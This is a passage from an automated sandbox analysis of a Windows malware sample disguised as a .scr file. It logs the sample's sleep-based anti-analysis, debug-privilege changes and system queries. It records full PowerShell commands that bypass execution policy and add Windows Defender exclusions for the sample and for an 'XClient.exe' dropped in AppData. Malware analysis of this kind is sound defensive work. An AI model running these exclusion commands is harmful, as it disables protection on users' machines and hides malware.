              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe TID: 3160Thread sleep count: 41 > 30Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe TID: 3160Thread sleep time: -37815825351104557s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe TID: 2924Thread sleep count: 453 > 30Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe TID: 2924Thread sleep count: 9372 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 612Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5716Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6440Thread sleep count: 8015 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep count: 1605 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep count: 7858 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep count: 1829 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3180Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2664Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: THITWNSEI24112908089786756456545346568789-00010.scr.exe, 00000003.00000002.4559034426.00000000014AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe'
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe'Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe'
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe "C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe"Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe'Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'THITWNSEI24112908089786756456545346568789-00010.scr.exe'Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
